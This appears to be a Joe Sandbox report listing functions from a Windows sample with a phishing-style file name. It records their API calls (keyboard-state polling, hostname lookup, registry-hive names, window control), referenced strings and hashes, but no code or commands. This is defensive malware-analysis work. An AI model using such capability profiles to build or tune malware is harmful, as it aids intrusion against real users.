Opcode ID: 10594a3da75227ee79b6e0fc7900d66cf2cc5a15cf9137ef3b7675ef77d93fdb
Instruction ID: 765d9bc3826ec9b1f683028ea6b9e1450887b11333ecce40b9a5e3d89d830bfd
Opcode Fuzzy Hash: 10594a3da75227ee79b6e0fc7900d66cf2cc5a15cf9137ef3b7675ef77d93fdb
Instruction Fuzzy Hash: 9671D274A00255BBEB219F25DC85FAABFA4FF05364F200296F525A61E1CBF16C60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C310A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C30038,?,?), ref: 00C310BC

Strings

HKEY_CURRENT_CONFIG, xrefs: 00C31179
HKEY_USERS, xrefs: 00C311BD
HKU, xrefs: 00C311CE
HKEY_LOCAL_MACHINE, xrefs: 00C31125
HKLM, xrefs: 00C3113A
HKEY_CURRENT_USER, xrefs: 00C3119B
HKCU, xrefs: 00C311AC
HKCR, xrefs: 00C31164
HKCC, xrefs: 00C3118A
HKEY_CLASSES_ROOT, xrefs: 00C3114F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: e98adfbe5766ce088b88a849d2a01050d26b5a98836df88964770cf1230419d8
Instruction ID: f5851f9e72326e3dab1842286faa7c2bb3af2b8c4c010103675c300549b5e06f
Opcode Fuzzy Hash: e98adfbe5766ce088b88a849d2a01050d26b5a98836df88964770cf1230419d8
Instruction Fuzzy Hash: 1E41427016024E9FCF20EFA0DC916EF3765AF11350F5444A6FCA197251EB71AE5AC760

Uniqueness

Uniqueness Score: -1.00%

Function 00C15569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

Part of subcall function 00BB7A84: _memmove.LIBCMT ref: 00BB7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C155D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C155E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C155F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C1560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C1561C

Strings

alias PlayMe, xrefs: 00C155AB
open , xrefs: 00C15581
close PlayMe, xrefs: 00C155E3, 00C15610
play PlayMe wait, xrefs: 00C15606
play PlayMe, xrefs: 00C15617
status PlayMe mode, xrefs: 00C155CD

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: a156ad0646a06d5dbf9b18d5f4ee350214f246d89bffb82dc1f68a8c2426e2de
Instruction ID: 672aaab02c4edafa30d55645d97a55e92bcdda7c0ce7f04d844f5f6c602d01a2
Opcode Fuzzy Hash: a156ad0646a06d5dbf9b18d5f4ee350214f246d89bffb82dc1f68a8c2426e2de
Instruction Fuzzy Hash: CA119820590559BAD730B661CCCADFF7BBCEFD2B00F4004B9B411A21E1DEA09E45C9A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C148F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C1490E
gethostname.WSOCK32(?,00000100), ref: 00C14928
gethostbyname.WSOCK32(?), ref: 00C14935
_wcscpy.LIBCMT ref: 00C1495D
_memmove.LIBCMT ref: 00C14970
inet_ntoa.WSOCK32(?), ref: 00C1497B
_strcat.LIBCMT ref: 00C14989
_wcscpy.LIBCMT ref: 00C149A0
WSACleanup.WSOCK32 ref: 00C149AE
_wcscpy.LIBCMT ref: 00C149BC

Strings

0.0.0.0, xrefs: 00C14957

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: a441440c196e9fe43388ba321c88d6a2c6ec689872e0791101b86f98947af512
Instruction ID: f05fab2c2c7e98c9ab97ff914d6e38f82c5077fc42b6646afcb3f1a2c76691b8
Opcode Fuzzy Hash: a441440c196e9fe43388ba321c88d6a2c6ec689872e0791101b86f98947af512
Instruction Fuzzy Hash: CD11D531914114ABCB28EB64AC46FDF77ECDF42710F0405BAF40896191FF709AC296A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C15217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C1521C

Part of subcall function 00BD0719: timeGetTime.WINMM(?,76C1B400,00BC0FF9), ref: 00BD071D

Sleep.KERNEL32(0000000A), ref: 00C15248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00C1526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C1528E
SetActiveWindow.USER32 ref: 00C152AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C152BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C152DA
Sleep.KERNEL32(000000FA), ref: 00C152E5
IsWindow.USER32 ref: 00C152F1
EndDialog.USER32(00000000), ref: 00C15302

Strings

BUTTON, xrefs: 00C15280

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 7dca707c4bfc2f39ea4883b604a4df55a0c704b96a6987166b20d7fd578eb34b
Instruction ID: fbf542cdb175293a869d126d19abc9d381b4cb28fd4ed6077e20bd44b5a77487
Opcode Fuzzy Hash: 7dca707c4bfc2f39ea4883b604a4df55a0c704b96a6987166b20d7fd578eb34b
Instruction Fuzzy Hash: 3B21D871114B09EFE7415F30ED89B6D3B69EB86386F00193CF019821B1EB719DC1AB21

Uniqueness

Uniqueness Score: -1.00%

Function 00C1D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

CoInitialize.OLE32(00000000), ref: 00C1D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C1D8E8
SHGetDesktopFolder.SHELL32(?), ref: 00C1D8FC
CoCreateInstance.OLE32(00C42D7C,00000000,00000001,00C6A89C,?), ref: 00C1D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C1D9B7
CoTaskMemFree.OLE32(?,?), ref: 00C1DA0F
_memset.LIBCMT ref: 00C1DA4C
SHBrowseForFolderW.SHELL32(?), ref: 00C1DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C1DAAB
CoTaskMemFree.OLE32(00000000), ref: 00C1DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C1DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00C1DAEB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 3331ca7cb2cf3f89c1e76ace463f4ccb64dfa5f1eb98b4f702cfbc1c7126b3ea
Instruction ID: 0a65f7cb5076fea7ff3e8b3fea3d51e6b30b48a3c7bba8d87da7330459e411b0
Opcode Fuzzy Hash: 3331ca7cb2cf3f89c1e76ace463f4ccb64dfa5f1eb98b4f702cfbc1c7126b3ea
Instruction Fuzzy Hash: A5B1ED75A00109AFDB14DF64C888EAEBBF9FF49304B1484A9F506EB261DB70EE45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C1052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C105A7
SetKeyboardState.USER32(?), ref: 00C10612
GetAsyncKeyState.USER32(000000A0), ref: 00C10632
GetKeyState.USER32(000000A0), ref: 00C10649
GetAsyncKeyState.USER32(000000A1), ref: 00C10678
GetKeyState.USER32(000000A1), ref: 00C10689
GetAsyncKeyState.USER32(00000011), ref: 00C106B5
GetKeyState.USER32(00000011), ref: 00C106C3
GetAsyncKeyState.USER32(00000012), ref: 00C106EC
GetKeyState.USER32(00000012), ref: 00C106FA
GetAsyncKeyState.USER32(0000005B), ref: 00C10723
GetKeyState.USER32(0000005B), ref: 00C10731

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 6971225635e2f6b9b4b53eba3f0f4c801d767baa25716a72a01dfc6829b31824
Instruction ID: 5b897019a547fe82650d26bbc79d68a694786d0dc847ece369bc1c7b5affd0f9
Opcode Fuzzy Hash: 6971225635e2f6b9b4b53eba3f0f4c801d767baa25716a72a01dfc6829b31824
Instruction Fuzzy Hash: 2651ED30A0478829FB34DBA084547EEBFB59F03340F18859ED9D2561C2DAD49BCCEB55

Uniqueness

Uniqueness Score: -1.00%

Function 00C0C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C0C746
GetWindowRect.USER32(00000000,?), ref: 00C0C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C0C7B6
GetDlgItem.USER32(?,00000002), ref: 00C0C7C1
GetWindowRect.USER32(00000000,?), ref: 00C0C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C0C827
GetDlgItem.USER32(?,000003E9), ref: 00C0C835
GetWindowRect.USER32(00000000,?), ref: 00C0C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C0C889
GetDlgItem.USER32(?,000003EA), ref: 00C0C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C0C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00C0C8C1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 425c82bfcf2295a09afabe931218e9790593d9efc5c63b8a793492fba7413c2c
Instruction ID: 9b938e1b396e361e5a957a139a000a9b66f90d6675368307aa6bc3515bdc2c05
Opcode Fuzzy Hash: 425c82bfcf2295a09afabe931218e9790593d9efc5c63b8a793492fba7413c2c
Instruction Fuzzy Hash: 59513071B10205ABDB18CFA9DD89BAEBBB6EB88310F14862DF515D62D0D7709E01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BB201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB2036,?,00000000,?,?,?,?,00BB16CB,00000000,?), ref: 00BB1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BB20D3
KillTimer.USER32(-00000001,?,?,?,?,00BB16CB,00000000,?,?,00BB1AE2,?,?), ref: 00BB216E
DestroyAcceleratorTable.USER32(00000000), ref: 00BEBEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BB16CB,00000000,?,?,00BB1AE2,?,?), ref: 00BEBF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BB16CB,00000000,?,?,00BB1AE2,?,?), ref: 00BEBF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BB16CB,00000000,?,?,00BB1AE2,?,?), ref: 00BEBF5A
DeleteObject.GDI32(00000000), ref: 00BEBF6C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 518ee710365db3586c7671bfb1812e6d4c1da3fdb628ecb022f16169e9a2f39f
Instruction ID: 723b9ab51eba3e1f4b434a633c7c400c1b0112267116d703d3f9dc72bf6f275b
Opcode Fuzzy Hash: 518ee710365db3586c7671bfb1812e6d4c1da3fdb628ecb022f16169e9a2f39f
Instruction Fuzzy Hash: 8261AA30500A40DFDB39AF19CD89B7AB7F1FF40312F5089ADE14696AA0C7B1A881DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00BB21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00BB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BB25EC

GetSysColor.USER32(0000000F), ref: 00BB21D3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 497dd1e12f33e63d2ec07a4bb36887edcb9b715ff55de3e5a8897ba750e4762e
Instruction ID: 5b3624718f3b5267daa07e56d60a2f201f7b0168a0989ce3eee7857b71353416
Opcode Fuzzy Hash: 497dd1e12f33e63d2ec07a4bb36887edcb9b715ff55de3e5a8897ba750e4762e
Instruction Fuzzy Hash: A441AD31400544AFDB255F28EC88BFD3BA6EB06331F1842A9FD65DA1E6C7B18C42DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C1AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00C3F910), ref: 00C1AB76
GetDriveTypeW.KERNEL32(00000061,00C6A620,00000061), ref: 00C1AC40
_wcscpy.LIBCMT ref: 00C1AC6A

Strings

network, xrefs: 00C1ABD4
all, xrefs: 00C1AB7C
ramdisk, xrefs: 00C1ABEA
removable, xrefs: 00C1ABA8
unknown, xrefs: 00C1AC01
fixed, xrefs: 00C1ABBE
cdrom, xrefs: 00C1AB92

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: e5fb8c5df1b7ed87046b5b56213d548257e3b17f114a4694eeb9c74ec19d0574
Instruction ID: 4b876bb09648ffb2348cbd709055167b6f7b58718a19ab154c5266bc0c603116
Opcode Fuzzy Hash: e5fb8c5df1b7ed87046b5b56213d548257e3b17f114a4694eeb9c74ec19d0574
Instruction Fuzzy Hash: D751D1701183419BC720EF14C891AEEB7E6EF86700F50486EF496572A2DB71DE89DB53

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00BB99C2
__swprintf.LIBCMT ref: 00BB9A0C
__i64tow.LIBCMT ref: 00BEFA0F

Strings

%.15g, xrefs: 00BB9A06
0x%p, xrefs: 00BEF9F1
False, xrefs: 00BEF9D7
True, xrefs: 00BEF9D0

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 8bcbe3ddf1e1adb163e200d716363853d785d2bb29f62c0f189b2058f34ad410
Instruction ID: 5f29cacfc7153a91220cb84c9adc44b58ae22add7d85a1e8d8a820ff0dcb065c
Opcode Fuzzy Hash: 8bcbe3ddf1e1adb163e200d716363853d785d2bb29f62c0f189b2058f34ad410
Instruction Fuzzy Hash: 5141C575504205AFDB24AF39DC82FB6B7E8EB44300F2444EEE689D7292EAB1D941DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C373C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C373D9
CreateMenu.USER32 ref: 00C373F4
SetMenu.USER32(?,00000000), ref: 00C37403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C37490
IsMenu.USER32(?), ref: 00C374A6
CreatePopupMenu.USER32 ref: 00C374B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C374DD
DrawMenuBar.USER32 ref: 00C374E5

Strings

0, xrefs: 00C373CF
F, xrefs: 00C374D1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: d68f8ef6c18930de0913982a90384e29e20cc5e426881dfe599c28b43ce24fe9
Instruction ID: fa444bfa87e5a9e2ff3063d584d5ec659fe99deffd16e9cdb462f82b6969a915
Opcode Fuzzy Hash: d68f8ef6c18930de0913982a90384e29e20cc5e426881dfe599c28b43ce24fe9
Instruction Fuzzy Hash: AC4135B5A10209EFDB21DF64D884F9ABBF9FF49300F144529E95597360D730AA10CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C3772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C377CD
CreateCompatibleDC.GDI32(00000000), ref: 00C377D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C377E7
SelectObject.GDI32(00000000,00000000), ref: 00C377EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C377FA
DeleteDC.GDI32(00000000), ref: 00C37803
GetWindowLongW.USER32(?,000000EC), ref: 00C3780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C37821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C3782D

Strings

static, xrefs: 00C37765

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: b65913925a0c4babb7ae53ffc3cbaa6cf799efd1b5ab9775083659b99a3e8dd2
Instruction ID: e8245f34a994bce167b6da27072431e1fe658ebaa7af2d23641ddc26842aba52
Opcode Fuzzy Hash: b65913925a0c4babb7ae53ffc3cbaa6cf799efd1b5ab9775083659b99a3e8dd2
Instruction Fuzzy Hash: 12318D71525215BBDF229F64DC09FDE3B69FF0A321F110728FA25A60A0C731D812DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BD7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BD707B

Part of subcall function 00BD8D68: __getptd_noexit.LIBCMT ref: 00BD8D68

__gmtime64_s.LIBCMT ref: 00BD7114
__gmtime64_s.LIBCMT ref: 00BD714A
__gmtime64_s.LIBCMT ref: 00BD7167
__allrem.LIBCMT ref: 00BD71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD71D9
__allrem.LIBCMT ref: 00BD71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD720E
__allrem.LIBCMT ref: 00BD7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD7243
__invoke_watson.LIBCMT ref: 00BD72B4

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
